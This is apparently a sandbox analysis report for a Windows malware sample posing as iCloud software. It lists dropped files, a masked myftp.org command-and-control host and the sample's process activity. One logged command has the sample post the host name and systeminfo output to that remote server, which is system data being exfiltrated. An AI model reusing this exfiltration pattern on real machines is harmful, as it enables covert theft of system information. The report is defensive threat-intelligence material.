Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im IcloudMonitor.exe
- <SYSTEM32>\ntvdm.exe
- %TEMP%\7ZipSfx.000\icloud.exe
- %TEMP%\7ZipSfx.000\system32.ini
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\IcloudSecurity\icloud.ini
- %TEMP%\7ZipSfx.000\IcloudMonitor.exe
- %TEMP%\7ZipSfx.000\ipads.cmd
- %TEMP%\7ZipSfx.000\icloud.ini
- %TEMP%\7ZipSfx.000\icloud.ins
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- 'ar####rt.myftp.org':80
- http://ar####rt.myftp.org/
- DNS ASK ar####rt.myftp.org
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c6c.c70.380001'
- ClassName: '' WindowName: ''
- '%TEMP%\7ZipSfx.000\IcloudMonitor.exe' --post-data="comp=CRNJEUFU&id=vz_CRNJEUFU_is&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: 5.1.2600 S...
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\ntvdm.exe' -f
- '<SYSTEM32>\ping.exe' 127.0.0.1
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\ipads.cmd" "
- '<SYSTEM32>\find.exe' icloud.ins "Microsoft Windows XP"
- '<SYSTEM32>\cmd.exe' /c vol c: